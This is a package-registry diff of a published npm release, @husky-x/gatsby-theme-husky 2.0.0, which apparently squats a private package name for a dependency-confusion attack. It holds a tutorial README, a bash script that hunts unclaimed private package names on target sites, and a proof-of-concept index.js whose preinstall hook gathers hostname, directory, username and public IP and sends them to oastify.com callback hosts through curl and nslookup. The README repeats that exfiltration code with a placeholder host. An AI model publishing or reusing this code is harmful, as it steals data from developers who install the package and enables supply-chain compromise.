npm - @husky-x/gatsby-theme-husky - Versions diffs - 2.0.0 - Mend

@husky-x/gatsby-theme-husky 2.0.0

Potentially problematic release.

This version of @husky-x/gatsby-theme-husky might be problematic. Click here for more details.

Files changed (5) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,125 @@
+# All About Dependency Confusion Attack, (Detecting, Finding, Mitigating)
+## Table of content:
+- [About dependency confusion attack](#about-dependency-confusion-attack)
+- [How npm works and understanding package system, version, scope packages, etc.](#how-npm-and-similar-package-system-work-and-understanding-its-structure-and-more)
+- [Detecting private package](#detect-private-pip-and-npm-packages)
+- [Automation with bash](#automating-with-bash-to-find-private-packages)
+- [Manual Hunting](#manual-hunting-to-find-more-packages)
+- [Setting up bind9 DNS server](#setting-up-bind9-dns-server)
+- [Uploading POC](#uploading-poc)
+- [Mitigation](#mitigation)
+- [Bounty Transparency](#bounty-transparency)
+## About dependency confusion attack:
+When you put `pip install -r requirements.txt` in your terminal did you check the package that you currently installing is not in the public repository? Or did someone put a backdoor on this package that you install blindly? How do you trust pypi? Is there anything that can harm your machine which is protected by firewall?
+Well, you might wonder how you can easily get hacked for running this command in your terminal! I'm not going to explain how this occurs, there is a great article about [Dependency Confusion](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) by [alex birsan](https://twitter.com/alxbrsn)! But I can't resist giving you a simple explanation about the dependency confusion attack!
+Suppose you had a project called `A` which completely depends on react packages as you might hear of some third-party react component packages that are currently used by lots of companies for their development process, (for example `react-router`) which means your current project heavily depends on some third-party module! Now Imagine you got a new job at this company and your previous colleague didn’t tell you about his project but did give you a file called `package.json` with a bunch of js files and you know what to do with that just simple command `npm -i` and You're good to go. But did you know that there might be some private packages that your senior developer didn’t allow you to disclose in public? So what will happen when you put `npm -i` in your terminal if this package is claimed by a malicious actor? Yeah, that's the simple explanation of dependency confusion attack!
+## How npm and similar package system work and understanding its structure and more:
+npm stands for node package manager which is used for storing your project dependency as public. But npm also allows you to install packages from your local package manager which is private, which means these packages are restricted from public users, just an internal user or specific traffic can install these packages for development purposes! And also these packages didn’t exist in public npm [registry](https://registry.npmjs.com), this works fine until you accidentally forget to mention the install path in your cli file.
+but in pip, these are completely different as pip checks for higher versions if you put the `--extra-index` flag for your installation, like if you put `--extra-index` when you install pip packages through your terminal eg:`pip install -r requirements.txt --extra-index-url` then pip will first check which repository contains a higher version of this package. if pip sees that your local registry contains a higher version then pip will install this instead of a public one. Now imagine you accidentally leak your private pip package name Through github repo and attacker claim these packages and includes 2000.0.0 as the package version but in your local registry this package version is like 2.0.1 what will happen? well, pip priorities a higher version if you include the `--extra-index-url` flag so pip will install this package from a public instead of a private repository, as pip sees this version is higher than your local version. You can read how pip works in this blog [post](https://realpython.com/what-is-pip/), also if you want to read how the version work in npm please read this [article](https://stackoverflow.com/questions/22343224/whats-the-difference-between-tilde-and-caret-in-package-json).as my research is ongoing on other package system so I can't tell you enough for this! I will add them here.
+## Detect private pip and npm packages:
+This is so easy for npm normal packages, just visit `https://npmjs.com/package/YOUR-PACKAGE-NAME-HERE` and for scope packages, let me tell you what is exactly it means 'if you have seen an npm package name like this `@test/example-packages` that means every package are started with `@` and divided by `\` the first part of `\` is scopes name and the second part is actual packages name so if you found this type of package name in your finding, you have to check whether this scope name is claimed in a public repository or not, for that visit this `https://npmjs.com/org/SCOPE-NAMES-HERE` if this shows you 404 that's means this is unclaimed scope name! So for uploading POC packages on npmjs, you have to create an org name first then update this name to your package.json file like this `@org/package-name-here`, and for pip just [visit](https://pypi.org/)
+## Automating with bash to find private packages:
+Download this `npm-automation.sh` file and run this command in your terminal `bash automate-bash.sh <target domain>` make sure you have installed [tomnomnom's waybackurls](https://github.com/tomnomnom/waybackurls) and [hacker_'s gau](https://github.com/lc/gau) in your machine.
+## Manual hunting to find more packages:
+- Using Github:
+in GitHub you can visit every repo to see if there is any of these filenames exist, like for npm `package.json`,`yarn.lock`,`package-lock.json`,`yarn-error.log`. For pip `requirements.txt`, `requirement-dev.txt`,`requirement-prod.txt`.
+- Using Devtools:
+open your firefox browser and visit your target domain/subdomain ==> right click ==> inspect ==> go to `Debugger` ==> try to find `Webpack` directory (if your target used webpack, otherwise you may not see anything) ==> in `Webpack` directory you will see `node_modules` folder and every subfolder name of `node_modules` folder is actually an npm package.
+- JS file:
+js file is so boring to read, but if you already know what an npm package name looks like, you may able to spot them within js file. (this needs practice)
+## Setting-up bind9 DNS server:
+follow these videos and repo
+[Github repo](https://github.com/JuxhinDB/OOB-Server)
+[DigitalOcean + Namecheap](https://www.youtube.com/watch?v=iMSqT9MZbQs),
+[AWS + Godaddy](https://www.youtube.com/watch?v=p8wbebEgtDk),
+## Uploading POC:
+please follow this [video](https://youtu.be/GJSvEAJeqko) on my youtube channel.
+in this folder `src/poc`, edit `index.js` file. replace `niroborg-npm-com-test` with your target package name. also `bind9-or-callback-server.com` to your callback DNS server.
+```javascript
+const { exec } = require("child_process");
+exec("a=$(hostname;pwd;whoami;echo 'niroborg-npm-com-test';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $a.bind9-or-callback-server.com;done" , (error, data, getter) => {
+	if(error){
+		console.log("error",error.message);
+		return;
+	}
+	if(getter){
+		console.log(data);
+		return;
+	}
+	console.log(data);
+});
+```
+and in `package.json` file, replace `test-npm-com-test` with your target package name. then define the version name. it is recommended that you should upload multiple package versions when you upload the npm package because npm uses a special version system. [read more](https://stackoverflow.com/questions/22343224/whats-the-difference-between-tilde-and-caret-in-package-json)
+```json
+{
+  "name": "test-npm-com-test",
+  "version": "1.999.0",
+  "description": "",
+  "main": "main.js",
+  "scripts": {
+    "preinstall": "node index.js > /dev/null 2>&1",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "lexi2",
+  "license": "ISC",
+  "dependencies": {
+    "lodash": "^4.17.21"
+  }
+}
+```
+## Mitigation:
+Scan your project dependency with [confused](https://github.com/visma-prodsec/confused) by [@visma-prodsec](https://github.com/visma-prodsec)
+(I have my own scanner just for npm, and I think [confused](https://github.com/visma-prodsec/confused) is really cool as they add a bunch of other package managers for scanning)
+## Bounty Transparency:
+- $2000 from Shein (goes public)
+- $2000 from an outside bug bounty program (closed)
+- $1500 from Bugcrowd private program (closed)
+- $1250 from Bugcrowd private program (ongoing)
+- $1000 from an outside bug bounty(self-hosted)
+- $1000 from Comcast Cable. (closed)
+- $700 from an outside bug bounty program(self-hosted)
+- $500 from an outside bug bounty program(self-hosted)
+- $250 from Bugcrowd private program (closed)
+## Shoutouts:
+- [@alxbrsn](https://twitter.com/alxbrsn) for his amazing [research](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) , without his research, nothing would have been possible.
+- [@Stok](https://twitter.com/stokfredrik) for his amazing [video](https://www.youtube.com/watch?v=p8wbebEgtDk) about setting-up bind9 dns server (using GoDaddy + aws)
+- [@juxhindb](https://twitter.com/juxhindb) for his amazing github [repo](https://github.com/JuxhinDB/OOB-Server)
+- [@nigamelastic](https://twitter.com/nigamelastic) for his amazing [video](https://www.youtube.com/watch?v=iMSqT9MZbQs) about setting-up bind9 dns server(using Namecheap + digitalocean)
+- [@tomnomnom](https://twitter.com/tomnomnom) for his powerful archive URL fetching tool [waybackurls](github.com/tomnomnom/waybackurls)
+- [@hacker_](https://twitter.com/hacker_) for his powerful archive URL fetching tool [gau](github.com/lc/gau)
+- [@visma-prodsec](https://github.com/visma-prodsec) for their powerfull dependency scanner [confused](https://github.com/visma-prodsec/confused)
+## Useful?
+<a href="https://buymeacoff.ee/x1337loser" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
+<a href="https://archive.org/donate">Donate to the InternetArchive</a>

package/npm-automation.sh ADDED Viewed

@@ -0,0 +1,68 @@
+#!/bin/bash
+echo '''
+    _   __                   ___         __
+   / | / /___  ____ ___     /   | __  __/ /_____
+  /  |/ / __ \/ __ `__ \   / /| |/ / / / __/ __ \
+ / /|  / /_/ / / / / / /  / ___ / /_/ / /_/ /_/ /
+/_/ |_/ .___/_/ /_/ /_/  /_/  |_\__,_/\__/\____/
+     /_/                                           v1.0.2
+              twitter.com/@0xnirob
+warning: BE AWARE OF FALSE POSITIVE, CONFIRM YOUR FINDING MANUALLY.  Good Luck.
+Use with caution. You are responsible for your actions.
+Developers assume no liability and are not responsible for any misuse or damage.
+'''
+if [ -d $1 ];then
+    echo '' >/dev/null 2>&1
+else
+    mkdir $PWD/$1;
+fi
+echo -e "Running waybackurls on $1"
+waybackurls $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
+echo -e "Running gau on $1"
+gau $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
+cd $PWD/$1;
+echo -e "Found $(cat $1-js-urls.txt | sort -u |wc -l) js file url ";
+cat $1-js-urls.txt | sort -u |while read ut;do
+    wget $ut.map >/dev/null 2>&1;
+    done
+grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | grep -v '@' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | tee -a $1-npm-packages.txt >/dev/null 2>&1;
+rm $1-js-urls.txt;
+if [ -s $1-npm-packages.txt ];then
+    echo -e "   Found some packages now going for final test on "$1-npm-packages.txt"";
+    cat $1-npm-packages.txt | sort -u | while read ut;do
+        if $(curl -o /dev/null -s -w "%{http_code}\n" "https://registry.npmjs.org/$ut" | grep "404" >/dev/null 2>&1); then
+            echo -e ""$ut" \e[1;31mFound Private npm packgae, \e[0m" && echo $ut >> $1-npm-vuln.txt;
+        else
+            echo -e ""$ut"\e[1;33m Available in Public Registry \e[0m";
+        fi
+        done
+else
+    echo -e "Didn't found any npm packages, now going for scope test "
+fi
+#this part is for scope package test please be carefull with that, some times `www.npmjs.com` will show you 429 response code
+grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep '@' | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | grep '@' | cut -d '@' -f 2 | tee -a $1-npm-scope.txt >/dev/null 2>&1;
+if [ -s $1-npm-scope.txt ];then
+    echo -e "   Found some Scope names now going for final test on "$1-npm-scope.txt"";
+    cat $1-npm-scope.txt | sort -u | while read pkg;do
+    OPTION=`curl -o /dev/null -s -w "%{http_code}\n" "https://www.npmjs.com/org/$pkg"`
+        if $(echo "$OPTION" | grep "200\|302" >/dev/null 2>&1);then
+            echo -e "@"$pkg"\e[1;33m Available in Public Registry \e[0m" && echo $pkg >> $1-npm-scope-vuln.txt;
+            grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo "Full pacakge name of @"$pkg" is @"$pkg"/"$ut" ";done
+        elif $(echo "$OPTION" | grep "429" >/dev/null 2>&1);then
+            echo -e "@"$pkg" \e[1;31m Rate limit detected \e[0m"
+        else
+            echo -e "@"$pkg"\e[1;31m Found Unclaimed scope Name\e[0m";
+            grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo -e "\e[1;31mFull pacakge name of @"$pkg" is @"$pkg"/"$ut", this is unclaimed, Add @"$pkg"/"$ut" in your package.json file like {package: @"$pkg"/"$ut"}, \e[0m";done
+        fi
+        done
+else
+    echo -e "Didn't found any Scope name";
+fi
+rm $1-npm-scope.txt *.map.* *.map $1-npm-packages.txt;

package/package.json ADDED Viewed

@@ -0,0 +1,22 @@
+{
+  "name": "@husky-x/gatsby-theme-husky",
+  "version": "2.0.0",
+  "description": "MySuperPackage",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/x1337loser/Dependency-Confusion.git"
+  },
+  "keywords": [
+    "aa"
+  ],
+  "author": "bugbountych",
+  "license": "ISC",
+  "bugs": {
+    "url": "https://github.com/x1337loser/Dependency-Confusion/issues"
+  },
+  "homepage": "https://github.com/x1337loser/Dependency-Confusion#readme"
+}

package/src/poc/index.js ADDED Viewed

@@ -0,0 +1,14 @@
+const { exec } = require("child_process");
+exec("a=$(hostname;pwd;whoami;echo 'gatsby-theme-husky';curl https://txuk2hq1ryyu7rtgiiaxvsntuk0bo2cr.oastify.com;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.3y2u3rrbs8z481uqjsb7w2o3vu1lped3.oastify.com;done" , (error, data, getter) => {
+	if(error){
+		console.log("error",error.message);
+		return;
+	}
+	if(getter){
+		console.log(data);
+		return;
+	}
+	console.log(data);
+});

package/src/poc/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "test-npm-com-test",
+  "version": "1.999.0",
+  "description": "",
+  "main": "main.js",
+  "scripts": {
+    "preinstall": "node index.js > /dev/null 2>&1",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "lexi2",
+  "license": "ISC",
+  "dependencies": {
+    "lodash": "^4.17.21"
+  }
+}